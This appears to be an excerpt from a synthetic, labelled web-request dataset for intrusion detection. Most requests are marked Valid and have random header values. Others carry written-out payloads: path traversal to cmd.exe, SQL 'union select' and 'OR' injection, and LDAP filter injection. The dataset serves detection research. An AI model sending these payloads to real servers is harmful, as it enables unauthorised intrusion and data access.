Authorization: Basic dWd0ZjhlOjREbm4=
Range: -9,08359-983,16084-76
Referer: http://xltt.org/stHeok/mhmtoeM.conf
TE: trailers,deflate
Trailer: Referer
User-Agent: nooe (7cHC@4Ko5; ri6iLu2kZ)
UA-CPU: Sparc
UA-Disp: 0150,960,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8256x1298
Via: HTTP/7.9 www.ueAaopO.jpeg, 5.3 132.61.225.90:72, 4.8 179.232.56.164
Transfer-Encoding: identity
Upgrade: 9tr9iu/0.9
Warning: 643 99.90.218.216 "i6te3torsbteItixa4tu" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 5507795373725385751
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36109
Start - Id: 5652
class: Valid
PUT /eP35X/HcaswtrothiddaarrlT/ykHc26-5cCBkjO/8aeutfaeigikriiee/eCtc2RiqoreheSos/053jrOAc./cWfPK7vzb/sJiBX.CdcnBT.ANPID/htpassKtRyZVr1VJX@S/hfNWdT36nCform.asp? HTTP/1.0
Content-Length: 97
Content-Language: l9o,rrth4ur,8lu1shoi
Content-Encoding: compress
Content-Location: http://www.eTea.be/knel6p/duTnaeue/ebbix/aoi1l.bin
Content-MD5: dGllc2g3c3R0bWNiOWRtcg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Feb 08 13:50:53 CET
Last-Modified: Mon, 23 May 05 18:24:24 UTC
Host: 29.194.19.239
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.2
Accept-Language: e-iayrr
Cache-Control: max-age=86419
Client-ip: 169.217.120.61
Cookie: OdxqF=LOtak;peeT=93193;e4mH1oEtwrgctAp=482495;yj=rdapuj;seos=9uaggssa
Cookie2: $Version="544"
Date: Fri, 23 Jul 04 06:07:05 CET
ETag: "T.Pqqa6LYnln5XMdH"
Expect: bmwi
From: ncfnnd3s@pjasfsran.gov
If-Modified-Since: Fri, 08 Feb 08 14:39:37 UTC
If-Unmodified-Since: Sat, 05 Aug 06 11:06:52 GMT
If-Match: "Qg@JdowGRdiQv0-kQoC"
If-None-Match: "9P3tQg4Cz8pk30taXGiY"
If-Range: *
Max-Forwards: 6910
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM YTNiNG85bHJpc2VlZ0FtMDlBcnNsbld6dW9sZXRobmg5bA==
Authorization: raebe nlIr=8eotd
Range: 8237-7,80-5013
Referer: /edunis.ace
TE: trailers,gzip
Trailer: Authorization
User-Agent: rmto6rtr (mKf2tsa; a_b6ZegF@; yG6XTVU_; adHWBDpO; omDUymAdk)
UA-CPU: StrongARM
UA-Disp: 1912,4963,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 129x5543
Via: HTTP/6.8 www.erhix.htm
Transfer-Encoding: identity
Upgrade: nHtj/5.7, henx/4.4
Warning: 299 182.237.115.10 "ehssVhw" 
X-Forwarded-For: 93.141.115.142
X-Serial-Number: 59672
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pxwUawnl=43911366&geerjetf9iSdeu=r|&Idldnia4oa=75&nZgcitithsci85=r&jrow=~jrocrehksa3rlibtdwoa

End - Id: 5652
Start - Id: 8203
class: Valid
GET /8oXcN/n1mVWx4Ngjg99QdHU1/s.Q0jnEKp/.u/JYoGM/nP4m/e9wOn.shtml?nbnm6aubt=rnT&e1cTeSnNso=946347&slLa8hO=ntehzs3h+e&es4aicdt=H&rntudCe5ms=%3B&3Hlosuj11ase92=unsmeyvtupdatetssEl%3F&eeerbgamdoe3=tSseg4&include_E2s7t=sX8cOformn5iRtoh&i1mtRmdv91=p5QqBE&qAlPng6mrhrmvt6=genct%7Ey&Mm7e6l=ocraerstrtTiEau5sh HTTP/1.0
Host: 137.172.221.231:80
Connection: mttc6vm
Accept: video/*;q=0.6, audio/*, audio/*
Accept-Charset: iso-8859-7, windows-1255;q=0.6, iso-2022-jp;q=0.1
Accept-Encoding: gzip;q=0.1, gzip;q=0.6, identity, identity;q=0.2, deflate
Accept-Language: *
Cache-Control: e=etaisct
Client-ip: 29.74.169.9
Cookie: mtsemtqaxnseLem=$ (e;irc=3hci;FaUM-=4491645;hrnailme9=O ;re8uor5=rgYbRTHtFR
Cookie2: $Version="61"
Date: Thu, 26 Jun 08 06:02:51 GMT
ETag: W/"DRJC8rHF-BS084oq4"
Expect: 100-continue
From: tnjiee0n@rlf3ge.de
If-Modified-Since: Wed, 24 Mar 10 24:55:54 UTC
If-Unmodified-Since: Fri, 24 Dec 04 07:43:04 UTC
If-Match: "z47GMOtel2GJoZQKi"
If-None-Match: "NpsUqvEjnAQPAV3r3"
If-Range: Tue, 20 May 08 03:00:59 GMT
Max-Forwards: 9
MIME-Version: 1.5
Pragma: Y=istrEfdo
Proxy-Authorization: Digest cnonce="rtmdnshp"
Authorization: Digest qop=auth
Range: 972-39
Referer: /ifcLeqe/ausemh3/48qhS.php3
TE: chunked;q=0.2,gzip;q=0.6,chunked;q=0.4
Trailer: Accept-Charset
User-Agent: hUZM_mCk3 http://www.otrt.org
UA-CPU: x86
UA-Disp: 260,910,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1852x378
Via: FTP/8.4 www.utNx6.js:2, HTTP/3.0 184.100.234.43
Transfer-Encoding: gzip
Upgrade: 9o6e/7.7, eaTRi/7.4, yaoEli/5.7, rnj/7.6, pad/2.0
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 216.1.28.119
X-Serial-Number: 8468350
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8203
Start - Id: 184
class: Valid
GET /fqEkrnCYL4pp3sY/R0dimg.js?ocane0=I8qian6e+oK&fute=1zm&replaceukl0M=d1igs&jsaaaeadsenlne=oTf&FWDO7T7xm9n=rFqpUGS&e2txo1=clcthiftplc&1m=46319&vbscriptPohr=9942&69NmhtpassBnull=e8delr6d%5Di&1iHsVvUeqye=oeeure&c7dUheoesaI=eNPTvKn&AvadcovZohHr=3havingth HTTP/1.1
Host: 175.150.150.106
Connection: close
Accept: */*;q=0.7
Accept-Charset: us-ascii, shift_jis, utf-7, iso-8859-1, x-mac-greek
Accept-Encoding: 
Accept-Language: wrelSy-hThaeena, reo-ogbrtnle;q=0.0, tyemhz-u;q=0.9
Cache-Control: no-store
Client-ip: 57.232.136.172
Cookie: vr@p7iperl=457123
Cookie2: $Version="125"
Date: Sat, 15 Dec 07 18:51:07 GMT
ETag: "2B4t5ua5UDySS27d"
Expect: 100-continue
From: dcet@elLtesue.uk
If-Modified-Since: Fri, 17 Oct 08 24:27:08 GMT
If-Unmodified-Since: Sat, 16 Jun 07 06:57:35 CET
If-Match: *
If-None-Match: "JCsh3mXM8baj-iSgd"
If-Range: Sun, 06 Feb 05 24:39:28 GMT
Max-Forwards: 8
MIME-Version: 7.5
Pragma: ixomnq1='hHEmzno7'
Proxy-Authorization: NTLM cmd0Y3MxbmhuZXJCaWZsbmRyZTY5bWV5b2hjRmgzZ25hVWk4anRkd0dlVGhldA==
Authorization: Basic ZWlpeG9JbGQ6eDN0dGFidXk=
Range: 534828-
Referer: /yg6a/1hbOgej/fkaOc/vooS/iueeeiTo.nsf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/7.8 (Windows; U; Windows NT 6.1; St-kt; rv:4.9.0) Gecko/08421647
UA-CPU: 68000
UA-Disp: 1257,262,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7281x9184
Via: 6.6 65.105.37.76:80, FTP/0.4 www.e9tsn.css, FTP/3.4 230.80.90.208
Transfer-Encoding: identity
Upgrade: ahei/7.4, ea4eeh/0.5, diptss/4.0, ensoe3/8.3
Warning: 367 www.lqnT2.htm "rqtcera" 
X-Forwarded-For: 59.243.237.238
X-Serial-Number: 3449007851195603
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 184
Start - Id: 33160
class: Valid
PUT /sELthtyo4ewu/x5I.QqmGFHSKZ22_F8dZ/0a_Yp/hjHocAK6YzvOtCJ2Ru/PJ.jpeg? HTTP/1.1
Content-Length: 69
Content-Language: ran,yian
Content-Encoding: compress
Content-Location: /hkor6a/rmBe2.nsf
Content-MD5: Y2luZ3dvbWFtaGVURVBlcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Jul 05 06:36:25 GMT
Last-Modified: Thu, 18 Mar 04 13:42:15 UTC
Host: 214.135.173.49:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: liuOuneh-htaoi, uelre-9vee, oify-t;q=0.6
Cache-Control: max-age=06091
Client-ip: 64.222.39.32
Cookie: pzvEtBwaeg=9562333975;vuoxnTes=exechgLT;og7wiVsi0a=22;t9qr=erXrK
Cookie2: $Version="14"
Date: Fri, 04 Sep 09 07:12:22 GMT
ETag: "NQQJkp9hmxtBHK8H"
Expect: 100-continue
From: ntsrj@mDKe5itb.net
If-Modified-Since: Sat, 25 Jul 09 02:36:00 CET
If-Unmodified-Since: Sun, 11 Sep 05 05:37:20 UTC
If-Match: *
If-None-Match: "@jZfoOKS8qsbDglM"
If-Range: Wed, 19 Mar 08 24:22:20 UTC
Max-Forwards: 074
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic MWxlbTpkdm9T
Authorization: Digest nc=FbfCFAf1
Range: 032610-,-244
Referer: http://hlRe4ebk.gov/9otN1rhs.exe
TE: deflate
Trailer: Authorization
User-Agent: ctrwshrd1orteanseiT
UA-CPU: 68000
UA-Disp: 460,8217,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 492x1700
Via: 3.2 www.lIsazc.gif:6, fen/4.7 38.212.116.81, 9.1 www.i0oer.tiff
Transfer-Encoding: identity
Upgrade: lrh/0.7, ai4/1.8, kcj2NT/4.6
Warning: 785 59.47.177.70 "s8eahlsttutctoCtx" "Mon, 29 Sep 08 18:56:06 GMT"
X-Forwarded-For: 121.78.223.99
X-Serial-Number: 0421946796861302632
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

et4pnAoXns8=re'll&rd=aLSDv2th&ypl7j=Testylet$hawbin uysaccess_log

End - Id: 33160
Start - Id: 38931
class: LdapInjection
GET /41VC1UuiMaTdH4fby0X.exe?pscrhahfe=odumd5dn61+a+sl&Lfe0rseuns=eIfraoE&9qeeimun=mwataeqi&z@dropXp6utmpIf=Hasn8g4owzicsa&nr8aRoeer=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&eu=30149756&ettnc8e9Ure4a=79aMR7gb4Nr&53gapkliwssssl=t&uo=execdk&t8dotr=oN%4057SR&eeruaan=+1e6T&j2DTrA-0wwp-dZ=577&l3ietyhaa=0&ttzaioni4gehnen=hechod7nWlEnJe HTTP/1.1
Host: 55.52.28.209:0
Connection: keep-alive
Accept: video/*;q=0.9, text/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: Tcten7ei-foim;q=0.4, wmemte-y04Rh;q=0.5, Ot4tt-rl, ol0flir5-nFe;q=0.3, nU49mn-6tolxnBs
Cache-Control: ebee='enecc'
Client-ip: 200.234.213.150
Cookie: mndeze=glHcKina8mq;uotSuergqeenaja=477726472;skVxmeiepehnsMj=aetttsso2passthruj;;hv=8;xiouehit=oA-hF1V;ehfi=e
Cookie2: $Version="0"
Date: Tue, 08 Dec 09 13:44:33 UTC
ETag: "G8gtcoE@AXJYuBk"
Expect: 100-continue
From: Utnn8c@iodssieo.biz
If-Modified-Since: Sun, 30 Jan 05 13:50:27 GMT
If-Unmodified-Since: Mon, 29 Mar 10 19:12:14 CET
If-Match: *
If-None-Match: "BiMXICoHQdTSHQ0_R"
If-Range: *
Max-Forwards: 4
MIME-Version: 8.7
Pragma: nEene='mge'
Proxy-Authorization: NTLM NGloNUVlOER0YWFvb2dlMHRBZnZuR3RlczZodDJkaWVoc0Ruc2I=
Authorization: Digest response="AA6f35BFcE979e200Fe7DEbDCF7Aba9b"
Range: 272257-3
Referer: http://www.ntyye.gov/ueee4/ntrznr/2qon5n/Itajftao/9031un.jpeg
TE: deflate;q=0.8
Trailer: Host
User-Agent: torasp4iei/5.9
UA-CPU: Sparc
UA-Disp: 3455,6894,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 024x188
Via: 7.4 www.najSe.html, FTP/8.8 36.81.196.15, HTTP/6.8 www.5sineti.jpg:931
Transfer-Encoding: identity
Upgrade: mneSso/4.0, Ean/1.8
Warning: 241 39.229.17.174:8 "buhh0su2aszm" 
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38931
Start - Id: 2554
class: Valid
GET /esc.jpeg?aEuy4hu=jdslnlii&pt=m.mq.x&ic=csdhavingesaq%3BgewxbWsetU&sgocysy=70702520&gf9dx=I8ot2i&oooneete5=m1Eialr&gy=htsss+m3mailen&nfRio=roZfrestdin&HEPBmB8=i%3A+0nue+qr%5Csax%25-+2s HTTP/1.0
Host: 114.42.239.59
Connection: close
Accept: */*
Accept-Charset: windows-1252, euc-tw, x-mac-cyrillic, windows-1254;q=0.5
Accept-Encoding: identity;q=0.0, compress;q=0.0, deflate;q=0.4
Accept-Language: *;q=0.0
Cache-Control: max-age=40
Client-ip: 180.165.26.102
Cookie: uenepz=Btmeta;aee=ennFvANozd?imca
Cookie2: $Version="37"
Date: Wed, 14 May 08 12:35:25 UTC
ETag: W/"SDugzyeX7I4AF8uK0Qm"
Expect: 100-continue
From: ofHrc@8cET.be
If-Modified-Since: Sat, 06 Jun 09 11:00:39 CET
If-Unmodified-Since: Wed, 06 Oct 04 16:44:56 UTC
If-Match: *
If-None-Match: "3xtk.GjehfSDJ.6"
If-Range: "2URm52PL20q.K-ht"
Max-Forwards: 4141
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest username="snnogtsd"
Authorization: Basic eWdpdHQ4YW06d2FxZQ==
Range: -836,37315-,23-
Referer: http://www.s6htoot.ch/Elhrzh/otrUn.swf
TE: chunked,deflate
Trailer: If-Range
User-Agent: iuad/1.3
UA-CPU: x86
UA-Disp: 7814,3567,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 266x8527
Via: 1.2 www.aeeeLt.jpeg:37595, FTP/7.0 13.51.174.120:18087, 6.3 www.Htruh.htm
Transfer-Encoding: gzip
Upgrade: ms8e/5.5, bc0udr/8.6
Warning: 953 www.h8zy.png "teAfk" "Tue, 09 May 06 12:50:35 CET"
X-Forwarded-For: 237.59.187.114
X-Serial-Number: 8053339262095703049
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2554
Start - Id: 43732
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.eexio.ch
Connection: cpnaue
Accept: text/*, video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=4667
Client-ip: 42.85.153.5
Cookie: UBlsfMbodyIG_=961739421;7ITF=tpe;le=0ily;mhnretrhfeneEsN=375412;bgmteolet=3r@mmoouniontlcaq-sqFc ;lue1ai9ht0ep=tco
Cookie2: $Version="346"
Date: Wed, 16 Jun 04 17:18:47 UTC
ETag: "47mVLi4C04269L-1r"
Expect: eiy7a
From: erev@Ao0tpiRe2.ch
If-Modified-Since: Tue, 01 Nov 05 14:28:55 CET
If-Unmodified-Since: Sun, 09 Nov 08 20:05:01 GMT
If-Match: "lT0iO3k0TvAyLBF"
If-None-Match: *
If-Range: "RjeEnHTVkmsKZIAa"
Max-Forwards: 224
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic bnZzYWFFc2w6YWR1Y2R0cw==
Range: 7008-71
Referer: /ePsytT2/aoiudwlm/neewca/0zqiisx.jsp
TE: gzip,chunked;q=0.9,gzip;q=0.7
Trailer: Accept-Language
User-Agent: bnmyhinie (pMmvuDXdW; o9@PPMWDjX; o2ZCbp7V)
UA-CPU: 68000
UA-Disp: 903,5806,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 337x2229
Via: FTP/7.5 181.6.95.168, 1.8 www.l6ye.htm, HTTP/1.7 www.donk.jpeg
Transfer-Encoding: kilOte; sCgne=gsno
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 101.90.146.184
X-Serial-Number: 601406
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43732
Start - Id: 19045
class: Valid
GET /uqXBCSRhk2YV0Fp7EmL/xoeeveaFcsol1OLhndt/FdGvVkDD/VQhx4w_E2H/wBesicvdd4N/sGar5/i1UV/nVMYqJeC/8K@YizQ93rA/9processing-instructionIowVsp5WidincW/jck6aQGz.png? HTTP/1.0
Host: www.sya4ac4se.biz:0238
Connection: close
Accept: */*;q=0.5
Accept-Charset: shift_jis;q=0.7
Accept-Encoding: gzip, gzip, gzip;q=0.2
Accept-Language: Qttsl-e;q=0.9, s3oV-0p;q=0.3
Cache-Control: no-store
Client-ip: 76.12.148.135
Cookie: 3htCvtdedcfavzg=381397627;rLaccess_logM13Abgg=usI;ies=eerr>
Cookie2: $Version="761"
Date: Tue, 24 Apr 07 12:21:03 GMT
ETag: W/"ScEfWr5x08Nkz8UuRZ5"
Expect: 100-continue
From: meOreslm@oakuitLO.de
If-Modified-Since: Wed, 13 Feb 08 16:01:16 GMT
If-Unmodified-Since: Sun, 04 Apr 10 04:47:16 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 18 Dec 06 10:15:01 UTC
Max-Forwards: 5
MIME-Version: 8.2
Pragma: rla='seies9r'
Proxy-Authorization: NTLM Zm5yeW84TmZhZm9hYWl0c3N0OW5pNm4zZDd2ZnBkaGZuZWxtTmV2cnlhY3Ju
Authorization: Digest uri=/dkaitwe2/leath/teBry/ntdhjwz/ll1r.png
Range: 851710-
Referer: http://fasoo.be/pihpsHh/duoDnnoa/at5stti/tdwsdilr/7aeH.fgf
TE: trailers,trailers,deflate;q=0.4
Trailer: If-Match
User-Agent: nHware (1lou2kX; is-93ab; aF8JLIfN; pJhbgkp)
UA-CPU: MIPS
UA-Disp: 7710,898,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 470x6702
Via: 0.9 148.143.89.36, FTP/8.6 www.arcer.css:0203
Transfer-Encoding: gzip
Upgrade: e60/6.4, Dojen/4.5, 8latt/8.3
Warning: 355 www.Bdu6e.shtml "ia7hunlei" "Tue, 18 Dec 07 20:23:22 CET"
X-Forwarded-For: 210.182.2.227
X-Serial-Number: 2525148777282
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 19045
Start - Id: 2900
class: Valid
GET /eTnigjrrnnmtc/eWfS/oa3OaottdNhaoaiea2h/8eeIb9ctbeehijlim/t15ehseHf/nwrvsefnri/siturive.jpeg?WErMp.2q=43317681&eOjiS8ra=egs-hirrieentt&cnyeiO=psoYetmdphiuosn&9cedtit=6&T5systemMK8rK=2923084&slis=oaeeZawswdaep&MI4LI@4akuH=%5Co%24&mer=idesinttea%3Dyei HTTP/1.1
Host: www.8dru.it:80
Connection: keep-alive
Accept: audio/x-wav, application/rtf, video/quicktime
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-age=5
Client-ip: 247.180.237.116
Cookie: htG3SrAadOghe=16125;eeen4=toinAoOmErdlh;2bf=9853806;wltEdcsynils=n ;aRfwqeltUer=8;eez=192538
Cookie2: $Version="18"
Date: Fri, 20 Jan 06 13:50:38 CET
ETag: "YoVLgAESX.055Dg1cT"
Expect: dtsf=saae
From: r4yeo@9ynhuee.com
If-Modified-Since: Mon, 30 Jan 06 07:11:22 UTC
If-Unmodified-Since: Wed, 18 Mar 09 11:55:30 GMT
If-Match: "8kjkRESk..YvOMB"
If-None-Match: "rq0Zzb6BNQGgsft"
If-Range: Fri, 06 Jul 07 24:35:19 CET
Max-Forwards: 37
MIME-Version: 9.1
Pragma: uc=n
Proxy-Authorization: aHELco LimsO0e=ho98
Authorization: iun8 uagit=frc5he
Range: 76-51,73-
Referer: http://5thderei.it/rhmrr.swf
TE: chunked;q=0.5,gzip;q=0.9
Trailer: If-Range
User-Agent: nfjqms (ek9Kw@sKWC; oMW9yqTTYs)
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 640x6169
Via: HTTP/5.7 9.70.130.160:44068
Transfer-Encoding: gzip
Upgrade: 7I07i/0.7, ri7He/2.5
Warning: 969 www.nthaNniO.tiff "euint3iarnws" "Sat, 08 Aug 09 16:51:19 GMT"
X-Forwarded-For: 160.9.8.226
X-Serial-Number: 440914790634409640
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2900
Start - Id: 42579
class: SqlInjection
GET /ti-gL/jtiriaihYaet/cB05CyveAch21Z_.swf?mawnz4kieVcpa=a%40VeJw_OUkI&cd1=nnullEumLeoL&myE69vp=829218795&Kqwd=ane9oDauoi&he477tsnaha=whL&enpsuj=%27++++union++select++sum%28ennu%29++++from++++Pe--&eelch1deea=rdl%3D%3Fmy&mruhr5sdjn=u%40OUuzB1&xi71wseUeoiac=0940649928&nbAsmsaoAdttt7A=1937656 HTTP/1.0
Host: 220.57.47.27
Connection: iTre3ngl
Accept: image/jpeg, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: annoptws=uDra3r
Client-ip: 8.53.51.76
Cookie: rleeeegc=ehsamusr;TtnwErsa2=ilhthNie;rsock_streamsystemobjectOCv-btMo=s4 hr1lauitv
Cookie2: $Version="6"
Date: Thu, 22 Feb 07 16:07:32 CET
ETag: W/"g5aldUCmL8IGCrX"
Expect: wshtlUla
From: tmTstilr@oerx.it
If-Modified-Since: Wed, 10 Jun 09 15:04:01 GMT
If-Unmodified-Since: Sun, 01 Jan 06 24:54:21 GMT
If-Match: *
If-None-Match: "hlq23lU3Oh7z.8.ZDu"
If-Range: Mon, 23 Aug 04 03:16:17 UTC
Max-Forwards: 67
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic Nm9UYWV3c3I6bmUzYQ==
Authorization: NTLM eWFhdWlvV3N6b2l0T3RoYWczdndrcnRhbm1pdE1yaHRod29jcmlkTGF3
Range: -327,463619-533,09-501926
Referer: http://M7voe.com/esna/eiLEriio/44Terwb.mdb
TE: trailers,trailers
Trailer: From
User-Agent: eCXcweaub9/0.6
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x8196
Via: HTTP/0.3 www.5hrc.jpg, HTTP/9.8 130.173.125.146, 8.4 www.cwoefurv.tiff
Transfer-Encoding: Asgn
Upgrade: lxiev/4.8, Sc4/5.2, owd/0.5
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 81684
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42579
Start - Id: 41455
class: SqlInjection
PUT /t0xhmNhX7@q6/Rcfiposcqidj5a/zwIBcRmAZ-3d/RtlmeDiwehn3fEho/dLmR1o/Rautoexec6/idwTShsdnd/tlptofsrccMFssnt1ndh.tiff? HTTP/1.1
Content-Length: 235
Content-Language: ta5e,5cre,t6tfge
Content-Encoding: compress
Content-Location: http://www.eanasroe.cz/orInqeiS/aiktsoer/rdrxvon/staai2e/iaEl7a.aspx
Content-MD5: ZGl3QW9KaXNubjBhbkhvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Nov 06 09:43:06 UTC
Last-Modified: Mon, 05 Apr 04 16:58:21 GMT
Host: www.leeyns.it
Connection: tgeA
Accept: */*
Accept-Charset: x-mac-korean, x-mac-japanese
Accept-Encoding: gzip, compress, compress, identity;q=0.1, gzip;q=0.7
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 29.250.237.27
Cookie: ssfltmtevyLm=ntn1exeepaD6er;4ws13gasaI=aa0diFs8ejnoa
Cookie2: $Version="17"
Date: Sat, 24 May 08 14:32:52 UTC
ETag: W/"UtjPHEnCvSW5I-JRNNL"
Expect: qbgdelee=Idon
From: utrstns@Temsn.st
If-Modified-Since: Sun, 28 Sep 08 04:31:58 UTC
If-Unmodified-Since: Thu, 12 Jan 06 10:48:15 CET
If-Match: "2v3lzvV5sAL2aYxaIp"
If-None-Match: "4qNTzRe83ha600Dy_To3"
If-Range: "A6dE0CMJSLmqFf1d"
Max-Forwards: 9
MIME-Version: 2.7
Pragma: ef='tY'
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Basic cndpdDo3MHNqYXc=
Range: 863-,45-,1-
Referer: /e3t7/W8on.php3
TE: gzip,chunked;q=0.5
Trailer: Expect
User-Agent: nnnw8hooiuouroal8r
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 254x5165
Via: Wns/7.5 www.shdanli.jpg
Transfer-Encoding: utnba
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 500 www.ahpvda.gif "wpsouzhnbeu6jkz5A" "Sat, 07 Oct 06 04:07:23 UTC"
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nnsterxmNh=nittHauehEt2vs&gch=iAf&fAvbscriptA=89&a1qtslGhflsgH=gFnsock_streamoFnipoI&smd3r=GE&YJK6=ka&a &inauentaeSo='   OR ''   =  '&si=oSHhnr2(08h&nnaeadn= a<olo(a+u>eLopttoe&mgSehetalkgyreE=h azwa6gk2eincludes5

End - Id: 41455
Start - Id: 1713
class: Valid
GET /mucc_TShJte@D2u/execsxHy/j4zbfsk72gxiZo0klo.mspx?neoavwet5tziu=window.openautoexecteeHfIeioje&tfnugDtesxUbi=01408&piawtonbsTold=ororde%3Crirt%25ns&pcen8=i&hziWTahEianc=6oJxox9UI&sgnnheooNl=AtfxistdinacmdCon&quefGCyPWinmailE=St%7Ct HTTP/1.1
Host: www.u8seteuou.org
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-8;q=0.6, iso-2022-kr, us-ascii
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 114.67.189.247
Cookie: PwWpXu4EconnectP=530;snoeds=eeCN;enlnummi=gb;eyb90=faisfroe;scyiifnrp3bOz=hIeSrkccoaizn;Ebnlnl=81
Cookie2: $Version="8"
Date: Sun, 15 Jun 08 05:14:33 CET
ETag: "LqP66AJ3sj.doSbglm"
Expect: 100-continue
From: pa7hs@flEnsebniq.be
If-Modified-Since: Wed, 03 Dec 08 22:06:37 UTC
If-Unmodified-Since: Mon, 19 May 08 17:01:58 GMT
If-Match: "SOe.eZo5edygQk5nz"
If-None-Match: *
If-Range: Fri, 30 Jul 04 19:53:54 GMT
Max-Forwards: 8687
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: m4ed aerroneg=6bsq
Range: 1231-888775
Referer: http://www.kgsen6.de/rttciia/i7Ol/erpnho/d4oie.jpg
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: Mozilla/0.3 (Windows; U; Win 9x 7.1; tm-rE; rv:2.8.7) Gecko/84934385
UA-CPU: StrongARM
UA-Disp: 6638,4343,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 053x890
Via: HTTP/2.7 www.nfjrto.tiff:219
Transfer-Encoding: gzip
Upgrade: a5r3eT/8.7, twr6Ip/0.3, 0efb/4.1
Warning: 172 www.poy0Rt8.tiff "fikd" "Wed, 05 Aug 09 17:49:17 UTC"
X-Forwarded-For: 53.157.224.180
X-Serial-Number: 611656639991551
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1713
Start - Id: 46854
class: XSS
PUT /7hZ_/ti0rpde/btlnitftcda/mfjt.tiff? HTTP/1.1
Content-Length: 218
Content-Language: stc,ntaawoit
Content-Encoding: gzip
Content-Location: /avAa1n/zsemepA.bin
Content-MD5: bndhYnJodG11cmF0RkRTcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 Jul 06 08:10:49 GMT
Last-Modified: Fri, 14 Sep 07 24:03:33 GMT
Host: www.palssRyiaa.st
Connection: close
Accept: application/x-tar;q=0.7, application/postscript, video/mpeg;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: n0Rtdnr-hnm, Aatoip-useT;q=0.9
Cache-Control: no-transform
Client-ip: 116.169.8.10
Cookie: i8whe=9262271130;rhttqp8ekioiii=909946;ia3auhsEt=3tTs4 
Cookie2: $Version="455"
Date: Sat, 10 Oct 09 22:05:12 GMT
ETag: "HTJvF.2qTzNngibZ14mg"
Expect: eounOo
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Sun, 26 Aug 07 12:54:17 GMT
If-Unmodified-Since: Fri, 06 Nov 09 16:15:37 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 18 Aug 09 04:58:36 CET
Max-Forwards: 0
MIME-Version: 2.6
